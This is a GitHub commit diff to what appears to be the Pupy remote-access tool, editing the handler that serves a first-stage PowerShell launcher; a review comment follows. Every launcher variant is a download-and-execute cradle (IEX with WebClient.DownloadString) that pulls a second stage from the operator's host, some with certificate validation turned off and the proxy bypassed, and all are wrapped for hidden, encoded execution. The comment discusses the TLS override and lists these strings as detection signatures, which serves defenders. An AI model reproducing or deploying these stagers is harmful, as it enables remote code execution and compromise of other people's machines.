Fixed something,Add powershell exec using -Enc

Dc3 2017-03-11 02:43:04 +08:00 committed by GitHub
parent d8591a9263
commit 98565a75ae
1 changed files with 4 additions and 4 deletions


@ -92,16 +92,16 @@ class PupyPayloadHTTPHandler(BaseHTTPRequestHandler):
self.end_headers() self.end_headers()
if self.server.useTargetProxy == True: if self.server.useTargetProxy == True:
print colorize("[+] ","green")+"Stage 1 configured for using target's proxy configuration" print colorize("[+] ","green")+"Stage 1 configured for using target's proxy configuration"
if not self.ssl: if not self.server.ssl:
launcher = "IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two) launcher = "IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two)
else: else:
launcher = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two) launcher = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('https://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two)
else: else:
print colorize("[+] ","green")+"Stage 1 configured for NOT using target's proxy configuration" print colorize("[+] ","green")+"Stage 1 configured for NOT using target's proxy configuration"
if not self.ssl: if not self.server.ssl:
launcher = "$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two) launcher = "$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two)
else: else:
launcher = "$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two) launcher = "$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('https://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two)
launcher = create_ps_command(launcher, force_ps32=True, nothidden=False) launcher = create_ps_command(launcher, force_ps32=True, nothidden=False)
self.wfile.write(launcher) self.wfile.write(launcher)
print colorize("[+] ","green")+"[Stage 1/2] Powershell script served !" print colorize("[+] ","green")+"[Stage 1/2] Powershell script served !"
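Review bot: Both `ssl` branches still set `[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}`, so the `https://` URL that appears to be the new side of this hunk gives an encrypted fetch with no authentication of the server, and the override applies to the whole PowerShell process rather than to this one request. That is undocumented; I would put a comment above each `else:` that builds the TLS launcher, such as `# NOTE: certificate validation is disabled process-wide; the stage download is encrypted but the server is not authenticated`. For readers on the defensive side, the literals built here (`IEX (New-Object Net.WebClient).DownloadString(`, the `{$true}` validation callback, `GetEmptyWebProxy()`) are the strings that PowerShell script block logging and AMSI see after any command-line encoding is removed, so they are the useful things to match on. As a smaller style point, `if self.server.useTargetProxy == True:` reads better as `if self.server.useTargetProxy:`. The enclosing handler method starts before this hunk and continues after it, so the handling of `url_random_two` and the response headers is not visible here.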